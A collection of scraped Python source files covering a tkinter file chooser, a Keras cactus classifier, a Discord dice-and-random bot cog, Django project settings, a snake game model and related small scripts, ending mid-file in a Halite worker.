self.cnf[\"highlightbackground\"] = color\n self.btcnf[\"bg\"] = color\n self.btcnf[\"activeforeground\"] = color\n return self\n\n def set_highlightcolor(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"highlightcolor\"] = color\n return self\n\n def set_selectbackground(self, color=str):\n if color.strip() != \"\":\n self.cnf[\"selectbackground\"] = color\n self.btcnf[\"activebackground\"] = color\n return self\n\n def set_bd(self, value=int):\n if value > 0:\n self.cnf[\"bd\"] = value\n self.cnf[\"highlightthickness\"] = value\n self.btcnf[\"bd\"] = 0\n self.btcnf[\"highlightthickness\"] = value * 2 - 1\n return self\n\n def set_relief(self, value=str):\n if value.split() != \"\":\n self.cnf[\"relief\"] = value\n self.btcnf[\"relief\"] = value\n return self\n\n def set_font(self, font=()):\n if font.__len__() > 0:\n self.cnf[\"font\"] = font\n self.btcnf[\"font\"] = (\"楷书\", (font[1] - 1))\n return self\n\n def composition(self, takefocus=bool, width=int, title=None, fileType=[]):\n but_width = 10\n entry_width = width - but_width\n frame = tkinter.Frame(self.wm, width=width, highlightthickness=0, bd=0)\n self.path_choice = tkinter.Entry(frame, cnf=self.cnf, takefocus=takefocus, width=entry_width, textvariable=self.hintMsg)\n self.path_choice.bind(\"\", lambda event: self._buttonRelease_1(event, title, fileType))\n self.path_choice.pack(side=tkinter.LEFT, anchor=tkinter.W, expand=\"yes\", fill=tkinter.BOTH, ipadx=0, ipady=0, padx=0, pady=0)\n self.choice_but = tkinter.Button(frame, cnf=self.btcnf, text=\"浏览...\", width=but_width, takefocus=takefocus)\n self.choice_but.bind(\"\", lambda event: self._buttonRelease_1(event, title, fileType))\n self.choice_but.pack(side=tkinter.RIGHT, anchor=tkinter.E, expand=\"no\", fill=tkinter.BOTH, padx=0, pady=0)\n\n return frame\n\n def get_files(self):\n return self.select_files.copy()\n\n def _buttonRelease_1(self, event, title=None, fileType=None):\n \"\"\"\n 点击 选择文件或文件框事件\n :param event: 监听事件的对象\n :param title: 文件选择框的对象\n :param fileType: 文件类型,为列表元组类型 [(\"文件类型描述\",\"文件后缀,如“.txt”\")]\n :return:\n \"\"\"\n Thread(target=self._fileFiltrate, args=(event, title, fileType)).start()\n self.wm.focus_set()\n\n def _fileFiltrate(self, event, title, fileType):\n title = \"请选择文件\" if title == None else title\n fileType = [(\"请选择文件\", \"*\")] if fileType == None and fileType.__len__() <= 0 else fileType\n widget = event.widget\n if isinstance(widget, tkinter.Entry):\n pathvalue = file_wm.askopenfilenames(title=title, filetypes=fileType)\n elif isinstance(widget, tkinter.Button):\n pathvalue = file_wm.askdirectory(title=\"请选择路径!\", mustexist=True)\n\n if self.select_files.__len__() > 0:\n self.select_files.clear()\n\n if not pathvalue:\n self.hintMsg.set(value=self.hintMsgStr)\n return\n elif isinstance(pathvalue, tuple):\n self.select_files.extend(list(pathvalue))\n elif isinstance(pathvalue, str):\n for dir in os.listdir(pathvalue):\n tempStr = os.path.join(pathvalue, dir)\n if os.path.isfile(tempStr) and dir.endswith(fileType[0][1]):\n self.select_files.append(tempStr)\n\n if len(self.select_files) == 1:\n self.hintMsg.set(value=self.select_files[0])\n else:\n filenamelist = []\n for file_path in self.select_files:\n filenamelist.append(os.path.split(file_path)[1])\n self.hintMsg.set(value=\";\".join(filenamelist))\n","sub_path":"com/zcnst/view/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":17271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"548193943","text":"#Loading require library\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport os,cv2\nfrom IPython.display import Image\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import layers, models\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.applications.imagenet_utils import preprocess_input\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.applications.vgg16 import VGG16\n#print(os.listdir(\"/Users/napasin_h/Desktop/aerial-cactus-identification\"))\nimport numpy as np\n\ntrain_dir = \"/Users/napasin_h/Desktop/aerial-cactus-identification/train\"\ntest_dir = \"/Users/napasin_h/Desktop/aerial-cactus-identification/test\"\ntrain = pd.read_csv('/Users/napasin_h/Desktop/aerial-cactus-identification/train.csv')\ndf_test = pd.read_csv('/Users/napasin_h/Desktop/aerial-cactus-identification/sample_submission.csv')\n\n#Data preparation\n #Read picture file\n #Decode JPEG content to RGB pixels\n #Convert this into floating tensors\n #Rescale pixels values(0-255) to [0, 1] interval\n#add arguement 'validation_split' for spliting data automatically and add 'subset' for define 'training' or 'validation'\ndatagen = ImageDataGenerator(rescale = 1./255)\n#datagen = ImageDataGenerator(rescale = 1./255, validation_split = 0.25)\nbatch_size = 150\n\n#create a dataframe using pandas and text files provided,\n#and create a meaningful dataframe with columns having file name\n#(only the file names, not the path) and other classes to be used by the model\n#Change only 1 column to string\ntrain['has_cactus'] = train['has_cactus'].astype(str)\n#split train and validate dataset\ntrain_generator = datagen.flow_from_dataframe(dataframe = train[:15001], directory = train_dir, x_col = 'id',\n y_col = 'has_cactus', class_mode ='binary', batch_size = batch_size, target_size = (150, 150))\n\nvalidation_generator=datagen.flow_from_dataframe(dataframe = train[15000:], directory = train_dir, x_col = 'id',\n y_col = 'has_cactus', class_mode = 'binary', batch_size = 50, target_size=(150, 150))\n#try validation split in ImageDataGenerator\n#test_validation_split = datagen.flow_from_dataframe(dataframe = train, directory = train_dir, x_col = 'id',\n #y_col = 'has_cactus', class_mode ='binary', batch_size = batch_size ,subset = 'validation', target_size = (150, 150))\n\n#Convolutions are defined on two key parameters\n #The size of patches that are extracted from input feature map..ie here 3x3\n #The number of filters computed from convolutions\n\n#Building our model\n#5 Conv2D + Maxpooling2D stages with relu activation function.\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32, (3,3), activation='relu', input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPool2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3),activation='relu',input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPool2D((2, 2)))\nmodel.add(Conv2D(128, (3, 3),activation='relu',input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPool2D((2, 2)))\nmodel.add(layers.Conv2D(128, (3, 3),activation='relu',input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPool2D((2, 2)))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\nmodel.summary()\n\n#Compiling our model\n #loss: we will set our loss as binary_crossentropy since we are attacking a binary classification problem\n #optimizer : optimizers shape and mold your model into its most accurate possible form by futzing with the weights.\n #metrics : This is the evaluation criteria that we choose to evaluate our model\nmodel.compile(loss='binary_crossentropy',optimizer=optimizers.rmsprop(),metrics=['acc'])\n\n#Fitting our model\nepochs=10\nhistory=model.fit_generator(train_generator,steps_per_epoch=100,epochs=10,validation_data=validation_generator,validation_steps=50)\n\n#Evaluating our model\n\n#Improving our model using VGG16\nmodel_vg=VGG16(weights='imagenet',include_top=False)\nmodel_vg.summary()\n\n#Extracting features using VGG16\ndef extract_features(directory,samples,df):\n\n\n features=np.zeros(shape=(samples,4,4,512))\n labels=np.zeros(shape=(samples))\n generator=datagen.flow_from_dataframe(dataframe=df,directory=directory,x_col='id',\n y_col='has_cactus',class_mode='other',batch_size=batch_size,\n target_size=(150,150))\n i=0\n for input_batch,label_batch in generator:\n feature_batch=model_vg.predict(input_batch)\n features[i*batch_size:(i+1)*batch_size]=feature_batch\n labels[i*batch_size:(i+1)*batch_size]=label_batch\n i+=1\n if(i*batch_size>samples):\n break\n return(features,labels)\n\ntrain.has_cactus=train.has_cactus.astype(int)\nfeatures,labels=extract_features(train_dir,17500,train)\ntrain_features=features[:15001]\ntrain_labels=labels[:15001]\n\nvalidation_features=features[15000:]\nvalidation_labels=labels[15000:]\n\n#Reshaping our features to feed into our dense layers\n#df_test.has_cactus=df_test.has_cactus.astype(str)\ntest_features,test_labels=extract_features(test_dir,4000,df_test)\ntrain_features=train_features.reshape((15001,4*4*512))\nvalidation_features=validation_features.reshape((2500,4*4*512))\ntest_features=test_features.reshape((4000,4*4*512))\n\n#Define a densely connected network\nmodel=models.Sequential()\nmodel.add(layers.Dense(212,activation='relu',kernel_regularizer=regularizers.l1_l2(.001),input_dim=(4*4*512)))\nmodel.add(layers.Dropout(0.2))\nmodel.add(layers.Dense(1,activation='sigmoid'))\n\nmodel.compile(optimizer=optimizers.rmsprop(),loss='binary_crossentropy',metrics=['acc'])\nhistory=model.fit(train_features,train_labels,epochs=30,batch_size=15,validation_data=(validation_features,validation_labels))\n\n#making prediction\ny_pre=model.predict_proba(test_features)\n\n#making submission\ndf=pd.DataFrame({'id':df_test['id'] })\ndf['has_cactus']=y_pre\ndf.to_csv(\"submission.csv\",index=False)\n","sub_path":"cactus.py","file_name":"cactus.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"411942873","text":"#!/usr/bin/env python\n\n\"\"\"\nCreated by Eric Warburg on 2010-08-29.\nCopyright (c) 2010. All rights reserved.\n\"\"\"\n\n\nclass Bank(object):\n def __init__(self, start=0):\n self.balance = start\n \n def deposit(self, amount):\n if amount >= 0:\n self.balance += amount\n else:\n raise ValueError(\"Depositing a negative amount\")\n \n def bet(self, amount):\n if amount >= 0 :\n if (self.balance - amount) < 0:\n old_balance = self.balance\n self.balance = 0\n return old_balance\n else:\n self.balance -= amount\n return amount\n else:\n raise ValueError(\"Withdrawing a negative amount\")\n \n def restake(self, amount):\n if amount >= 0:\n self.balance = amount\n else:\n raise ValueError(\"Restaking with a negative amount\")","sub_path":"libpoker/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"554098188","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n[Function Description]\n------------------------------------------------------------------------------------------------------------------------\n\n------------------------------------------------------------------------------------------------------------------------\n\"\"\"\n\nimport time\nimport pandas as pd\n\n# Display all the columns of DataFrame\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n# Display all the columns of DataFrame within a single row\npd.set_option('display.width', None)\n\n\ndef factor_result(df_result, list_num):\n \"\"\"\n\n \"\"\"\n list_exp_num = list_num\n list_end_time = []\n list_eff_07 = []\n list_eff_08 = []\n list_eff_09 = []\n list_eff_10 = []\n list_section = []\n for num in list_exp_num:\n end_time = df_result.loc[num, 1.0]['end_time']\n eff_07 = df_result.loc[num, 0.7]['eff_total']\n eff_08 = df_result.loc[num, 0.8]['eff_total']\n eff_09 = df_result.loc[num, 0.9]['eff_total']\n eff_10 = df_result.loc[num, 1.0]['eff_total']\n ser_section = df_result.loc[num, 1.0][['section1', 'section2', 'section3', 'section4', 'section5']]\n list_end_time.append(end_time)\n list_eff_07.append(eff_07)\n list_eff_08.append(eff_08)\n list_eff_09.append(eff_09)\n list_eff_10.append(eff_10)\n list_section.append(ser_section.values)\n section_df = pd.DataFrame(list_section, columns=['section1', 'section2', 'section3', 'section4', 'section5'])\n result_dict = {'exp_num': list_exp_num, 'end_time': list_end_time,\n 'eff_0.7': list_eff_07, 'eff_0.8': list_eff_08, 'eff_0.9': list_eff_09, 'eff_1.0': list_eff_10}\n result_df = pd.DataFrame(result_dict)\n\n return result_df, section_df\n\n\nif __name__ == '__main__':\n\n file_path = r'H:\\VibrationTrace\\Experiment_Efficiency_Time.xlsx' # 此电脑文件夹\n df_data = pd.read_excel(file_path, skiprows=1, index_col=[0, 1]) # 读取时通过index_col设定多级索引\n\n exp_num_cw = [46, 54] # 顺时针\n exp_num_acw = [82, 90] # 逆时针\n num_cw_list = list(range(exp_num_cw[0], exp_num_cw[1] + 1))\n num_acw_list = list(range(exp_num_acw[0], exp_num_acw[1] + 1))\n df_data_cw, df_sec_cw = factor_result(df_data, num_cw_list)\n df_data_acw, df_sec_acw = factor_result(df_data, num_acw_list)\n df_data_direction = pd.concat([df_data_cw, df_sec_cw, df_data_acw, df_sec_acw], axis=1)\n print(df_data_direction)\n\n # 将DataFrame以EXCEL文件格式保存在桌面\n save_time = time.strftime('%y%m%d%H%M%S') # 年月日时分\n df_data_direction.to_excel(r'C:\\Users\\C\\Desktop\\Result_Factor%s.xlsx' % save_time)\n","sub_path":"Vibrating_Screen/visualize/exp_excel_sigmaplot.py","file_name":"exp_excel_sigmaplot.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"447809676","text":"from decorators import help\nimport discord\nfrom discord.ext import commands\nfrom enums.help_categories import Category\nfrom functions import colours\nimport random\nimport requests\nimport json\n\n\nclass Random(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n # Don't allow any commands to work when locked\n def cog_check(self, ctx):\n return not self.client.locked\n\n # Creates an alias\n @commands.command(name=\"Choice\", aliases=[\"Choose\"], usage=\"[Argumenten]\")\n async def choose(self, ctx, *options):\n await self.choice(ctx, *options)\n\n @commands.command(name=\"Shuffle\", usage=\"[Argumenten]\")\n async def _shuffle(self, ctx, *options):\n await self.shuffle(ctx, *options)\n\n @commands.group(name=\"Random\", aliases=[\"R\", \"Rand\", \"RNG\"], case_insensitive=True, invoke_without_command=True)\n @help.Category(category=Category.Random, unpack=True)\n async def random(self, ctx):\n pass\n\n @random.command(name=\"Choice\", usage=\"[Argumenten]\")\n async def choice(self, ctx, *options):\n if not options or not options[0]:\n return await ctx.send(\"Geef een geldige reeks op.\")\n\n await ctx.send(random.choice(options))\n\n @random.command(name=\"Number\", aliases=[\"Int\"], usage=\"[Van]* [Tot]*\")\n async def number(self, ctx, to=100, start=1):\n # This allows number(to) to work, as well as number(start, to)\n if start > to:\n start, to = to, start\n\n await ctx.send(random.randint(start, to))\n\n @number.error\n async def on_number_error(self, ctx, error):\n if isinstance(error, discord.ext.commands.BadArgument):\n await ctx.send(\"Dit is geen geldig getal.\")\n else:\n raise error\n\n @random.command(name=\"Name\")\n async def name(self, ctx):\n try:\n name = requests.get(\"https://randomuser.me/api/\").json()\n except json.decoder.JSONDecodeError:\n await ctx.send(\"Er ging iets mis. Probeer het opnieuw.\")\n return\n\n name = name[\"results\"][0][\"name\"]\n await ctx.send(\"{} {} {}\".format(name[\"title\"], name[\"first\"], name[\"last\"]))\n\n @random.command(name=\"Identity\", aliases=[\"Id\"])\n async def identity(self, ctx):\n try:\n identity = requests.get(\"https://randomuser.me/api/\").json()\n except json.decoder.JSONDecodeError:\n return await ctx.send(\"Er ging iets mis. Probeer het opnieuw.\")\n\n identity = identity[\"results\"][0]\n name = identity[\"name\"]\n name = \"{} {} {}\".format(name[\"title\"], name[\"first\"], name[\"last\"])\n\n gender = identity[\"gender\"]\n street = \"{} {}\".format(identity[\"location\"][\"street\"][\"number\"], identity[\"location\"][\"street\"][\"name\"])\n location = \"{}, {}, {}, {}\".format(street, identity[\"location\"][\"city\"],\n identity[\"location\"][\"state\"], identity[\"location\"][\"country\"])\n age = identity[\"dob\"][\"age\"]\n\n await ctx.send(\"{}\\n{}, {}\\n{}\".format(name, age, gender, location))\n\n @random.command(name=\"Shuffle\", aliases=[\"Order\"], usage=\"[Argumenten]\")\n async def shuffle(self, ctx, *args):\n if not args:\n return await ctx.send(\"Geef een geldige reeks op.\")\n\n args = list(args)\n\n random.shuffle(args)\n\n await ctx.send(\" - \".join(args))\n\n @random.command(name=\"Colour\", aliases=[\"Color\"])\n async def colour(self, ctx):\n r, g, b = colours.randomRGB()\n\n embed = discord.Embed(colour=discord.Colour.from_rgb(r, g, b))\n embed.set_author(name=\"Random Colour\")\n embed.add_field(name=\"RGB\", value=\"{}, {}, {}\".format(r, g, b), inline=False)\n embed.add_field(name=\"HEX\", value=colours.RGBToHEX(r, g, b), inline=False)\n embed.add_field(name=\"HSL\", value=\"{}°, {}%, {}%\".format(*colours.RGBToHSL(r, g, b)), inline=False)\n embed.add_field(name=\"HSV\", value=\"{}°, {}%, {}%\".format(*colours.RGBToHSV(r, g, b)), inline=False)\n await ctx.send(embed=embed)\n\n @random.command(name=\"Timestamp\", aliases=[\"Time\", \"Ts\"])\n async def timestamp(self, ctx):\n hour = str(random.randint(0, 23))\n hour = (\"0\" if len(hour) == 1 else \"\") + hour\n minutes = str(random.randint(0, 23))\n minutes = (\"0\" if len(minutes) == 1 else \"\") + minutes\n await ctx.send(\"{}:{}\".format(hour, minutes))\n\n @random.command(name=\"Fact\", aliases=[\"Knowledge\"])\n async def fact(self, ctx):\n randomFact = requests.get(\"https://uselessfacts.jsph.pl/random.json?language=en\").json()\n await ctx.send(randomFact[\"text\"])\n\n @commands.command(name=\"Yes/No\", aliases=[\"Yn\"])\n @help.Category(Category.Random)\n async def yesno(self, ctx):\n await ctx.send(random.choice([\"Ja.\", \"Nee.\"]))\n\n\ndef setup(client):\n client.add_cog(Random(client))\n","sub_path":"cogs/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"291393902","text":"# flake8: noqa\n\nfrom unipath import Path\n\nDEBUG = False\n\n# Absolute filesystem path to the project directory\nPROJECT_ROOT = Path(__file__).ancestor(4)\n\n# Absolute path to the Django subdirectory\nDJANGO_ROOT = PROJECT_ROOT.child('src')\n\n# Path to the directory where public files will be served\nPUBLIC_ROOT = PROJECT_ROOT.child('public')\n\nALLOWED_HOSTS = []\n\n\nDJANGO_APPS = [\n 'django.forms', # This is needed because of the custom form renderer\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.postgres',\n 'django.contrib.sites',\n 'django.contrib.flatpages',\n]\n\nTHIRD_PARTY_APPS = [\n 'compressor',\n 'rest_framework',\n 'django_xworkflows',\n]\n\nLOCAL_APPS = [\n 'core',\n 'accounts',\n 'home',\n 'geofr',\n 'backers',\n 'tags',\n 'aids',\n 'dataproviders',\n 'analytics',\n 'data',\n 'alerts',\n 'bookmarks',\n 'programs',\n 'categories',\n 'search',\n 'stats',\n 'pages',\n 'minisites'\n]\n\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n]\n\nROOT_URLCONF = 'core.urls'\n\nWSGI_APPLICATION = 'core.wsgi.application'\n\n# Password validation\n# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators\n\nVALIDATORS_PATH = 'django.contrib.auth.password_validation'\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': VALIDATORS_PATH + '.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': VALIDATORS_PATH + '.MinimumLengthValidator',\n 'OPTIONS': {\n 'min_length': 9,\n }\n },\n {\n 'NAME': VALIDATORS_PATH + '.CommonPasswordValidator',\n },\n {\n 'NAME': VALIDATORS_PATH + '.NumericPasswordValidator',\n },\n]\nAUTH_USER_MODEL = 'accounts.User'\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.0/topics/i18n/\n\nLANGUAGE_CODE = 'fr'\n\nTIME_ZONE = 'Europe/Paris'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = [\n DJANGO_ROOT.child('static'),\n DJANGO_ROOT.child('node_modules'),\n]\n\nSTATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n]\n\nSTATIC_ROOT = PUBLIC_ROOT.child('static')\n\nMEDIA_URL = '/media/'\n\nMEDIA_ROOT = PUBLIC_ROOT.child('media')\n\nNODE_MODULES_PATH = DJANGO_ROOT.child('node_modules')\n\nSASS_PATH = 'make css'\n\nCOMPRESS_PRECOMPILERS = (\n ('text/x-scss', '{} include={} infile={{infile}} outfile={{outfile}}'.format(\n SASS_PATH, NODE_MODULES_PATH)),\n)\n\nLOCALE_PATHS = [\n DJANGO_ROOT.child('locales'),\n]\n\nFORM_RENDERER = 'django.forms.renderers.TemplatesSetting'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [DJANGO_ROOT.child('templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'debug': False,\n 'context_processors': [\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'core.context_processors.integration',\n 'core.context_processors.contact_data',\n 'core.context_processors.admin_stats',\n 'core.context_processors.contributor_stats',\n ],\n 'libraries': {\n 'form_utils': 'core.templatetags.form_utils',\n }\n },\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',\n 'PAGE_SIZE': 50,\n}\n\n\n# Define a custom logger that sends events to admin users\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse',\n }\n },\n 'handlers': {\n 'mail': {\n 'level': 'INFO',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler',\n }\n },\n 'loggers': {\n 'aidesterritoires': {\n 'handlers': ['mail'],\n 'level': 'INFO',\n }\n }\n}\n\nADMINS = [('Aides-territoires', 'nowhere@example.org')]\n\nMAILING_LIST_URL = None\n\nAPPROACHING_DEADLINE_DELTA = 30 # days\n\nUNVALIDATED_ALERTS_QUOTA = 10\nMAX_ALERTS_QUOTA = 100\n\nANALYTICS_ENABLED = False\nANALYTICS_SITEID = 0\nHOTJAR_SITEID = 0\n\nCONTACT_EMAIL = 'nowhere@example.org'\nCONTACT_PHONE = '+33123456789'\nEMAIL_SUBJECT_PREFIX = '[Aides-Territoires] '\nDEFAULT_FROM_EMAIL = 'aides-territoires@beta.gouv.fr'\nSERVER_EMAIL = 'aides-territoires@beta.gouv.fr'\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nEMAIL_WHITELIST = []\n\nSITE_ID = 1\n\nLOGIN_URL = 'login'\nLOGOUT_REDIRECT_URL = 'home'\nLOGIN_REDIRECT_URL = 'profile'\n\nSEARCH_COOKIE_NAME = 'currentsearch'\n\nSIB_API_KEY = ''\nSIB_LIST_ID = ''\n","sub_path":"src/core/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589864179","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport enum\nimport collections\nimport random\nimport numpy as np\n\nclass CellType(enum.Enum):\n \"\"\"Defines all types of cells that can be found in the snake game.\n\n \"\"\"\n EMPTY = 0\n FRUIT = 1\n SNAKE_HEAD = 2\n SNAKE_BODY = 3\n WALL = 4\n\n\nclass Point(collections.namedtuple('PointTuple', ['x', 'y'])):\n \"\"\" Represents a 2D point with named axes (x, y).\n\n \"\"\"\n def __add__(self, other):\n \"\"\"Add two points coordinate-wise.\n\n \"\"\"\n return Point(self.x + other.x, self.y + other.y)\n\n def __sub__(self, other):\n \"\"\"Subtract two points coordinate-wise.\n\n \"\"\"\n return Point(self.x - other.x, self.y - other.y)\n\n\nclass Direction(enum.Enum):\n \"\"\"Defines all possible directions the snake can take, as well as the corresponding offsets.\n\n \"\"\"\n NORTH = Point(0, -1)\n EAST = Point(1, 0)\n SOUTH = Point(0, 1)\n WEST = Point(-1, 0)\n\n\nclass SnakeAction(enum.Enum):\n \"\"\"Defines all possible actions the agent can take in the environment.\n\n \"\"\"\n MAINTAIN_DIRECTION = 0\n TURN_LEFT = 1\n TURN_RIGHT = 2\n\n\nclass Snake(object):\n \"\"\"Represents the snake that has a position, can move, and change directions.\n\n \"\"\"\n def __init__(self, position, direction=Direction.NORTH, length=3):\n \"\"\"Create a new snake.\n\n Parameters\n ----------\n position: snake_entities.Point\n A point representing the initial position of the snake. \n\n direction: snake_entities.Direction\n Initial moving direction of the snake.\n\n length: integer\n An integer specifying the initial length of the snake.\n\n \"\"\"\n self._m_direction = direction\n self._m_all_directions = list(Direction)\n\n self._m_body = [position]\n for _ in range(length - 1):\n body_direction_idx = self._m_all_directions.index(direction) - 2\n cell = self._m_body[-1] + self._m_all_directions[body_direction_idx].value\n self._m_body.append(cell)\n self._m_body = collections.deque(self._m_body)\n\n @property\n def body(self):\n return self._m_body\n\n @property\n def head(self):\n return self._m_body[0]\n\n @property\n def tail(self):\n return self._m_body[-1]\n\n @property\n def length(self):\n return len(self._m_body)\n\n @property\n def direction(self):\n return self._m_direction\n\n def peek_next(self):\n \"\"\" Get the point the snake will move to at its next step. \"\"\"\n return self.head + self._m_direction.value\n\n def turn_left(self):\n direction_idx = self._m_all_directions.index(self._m_direction)\n self._m_direction = self._m_all_directions[direction_idx - 1]\n\n def turn_right(self):\n direction_idx = self._m_all_directions.index(self._m_direction)\n self._m_direction = self._m_all_directions[\n (direction_idx + 1) % len(self._m_all_directions)]\n\n def grow(self):\n \"\"\"Grow the snake by 1 block from the head. \"\"\"\n self._m_body.appendleft(self.peek_next())\n\n def move(self):\n \"\"\" Move the snake 1 step forward, taking the current direction into account.\"\"\"\n self._m_body.appendleft(self.peek_next())\n self._m_body.pop()\n\n\nclass Field(object):\n \"\"\"Represents the playing field for the Snake game.\n\n \"\"\"\n def __init__(self, field_map=None):\n \"\"\"Create a new Snake field.\n \n Parameters\n ----------\n field_map: list\n A list of strings representing the field objects (1 string per row).\n\n \"\"\"\n self._m_field_map_to_cell_type = {\n 'S': CellType.SNAKE_HEAD,\n 's': CellType.SNAKE_BODY,\n '#': CellType.WALL,\n 'O': CellType.FRUIT,\n '.': CellType.EMPTY,\n }\n\n self._m_cell_type_to_field_map = dict(\n (cell_type, symbol) for symbol, cell_type in self._m_field_map_to_cell_type.items()\n )\n\n self._m_field_map = field_map\n self._m_cells = None\n self._m_empty_cells = set()\n self.reset()\n\n def __getitem__(self, point):\n if not isinstance(point, Point) and not isinstance(point, tuple):\n raise TypeError(\"'point' is neither a Point instance or tuple instance\")\n x, y = point\n return self._m_cells[y, x]\n\n def __setitem__(self, point, cell_type):\n if not isinstance(point, Point) and not isinstance(point, tuple):\n raise TypeError(\"'point' is neither a Point instance or tuple instance\")\n\n x, y = point\n self._m_cells[y, x] = cell_type\n if cell_type == CellType.EMPTY:\n self._m_empty_cells.add(Point(x, y))\n else:\n if point in self._m_empty_cells:\n self._m_empty_cells.remove(Point(x, y))\n\n def reset(self):\n \"\"\"Create a new field based on the field map.\n\n \"\"\"\n try:\n self._m_cells = np.array([\n [self._m_field_map_to_cell_type[c] for c in row] for row in self._m_field_map\n ])\n\n self._m_empty_cells.clear()\n for y in range(self._m_cells.shape[0]):\n for x in range(self._m_cells.shape[1]):\n if self[(x, y)] == CellType.EMPTY:\n self._m_empty_cells.add(Point(x, y))\n\n except KeyError as err:\n raise ValueError(f'Unknown field map symbol: \"{err.args[0]}\"')\n\n def __str__(self):\n return '\\n'.join(\n ''.join(self._m_cell_type_to_field_map[cell] for cell in row) for row in self._m_cells\n )\n\n @property\n def cells(self):\n return self._m_cells\n\n @property\n def size(self):\n height, width = self._m_cells.shape\n return width, height\n\n def get_random_empty_cell(self):\n \"\"\"Choose an empty cell randomly.\"\"\"\n return random.choice(list(self._m_empty_cells))\n\n def find_snake_head(self):\n \"\"\"Find the snake's head on the field.\"\"\"\n width, height = self.size\n for x in range(width):\n for y in range(height):\n if self[(x, y)] == CellType.SNAKE_HEAD:\n return Point(x, y)\n raise ValueError('Initial snake position not specified on the field map')\n\n def place_snake(self, snake, clean=True):\n \"\"\"Put the snake on the field and fill the cells with its body.\n\n Parameters\n ----------\n snake: snake_entities.Snake\n The snake you want to place.\n\n clean: boolean\n Whether or not to clean the old Snake.\n\n \"\"\"\n if clean is True:\n width, height = self.size\n for x in range(width):\n for y in range(height):\n if self[(x, y)] == CellType.SNAKE_BODY or \\\n self[(x, y)] == CellType.SNAKE_HEAD:\n self[(x, y)] = CellType.EMPTY\n\n for snake_cell in snake.body:\n if self[snake_cell] == CellType.WALL:\n continue\n self[snake_cell] = CellType.SNAKE_BODY\n\n if self[snake.head] != CellType.WALL:\n self[snake.head] = CellType.SNAKE_HEAD\n\n","sub_path":"projects/games/code/snake/game/env/snake_entities.py","file_name":"snake_entities.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"613114339","text":"import urllib.request\nimport requests\nimport json\nfrom hashlib import md5\nimport configparser\nimport os\n\nconfig = configparser.ConfigParser()\nconfig.read(\"../halite.ini\")\nAPI_KEY = config.get(\"hce\", \"apiKey\")\nMANAGER_URL = config.get(\"hce\", \"managerURL\")\n\ndef getTask():\n\t\"\"\"Gets either a run or a compile task from the API\"\"\"\n\tcontent = 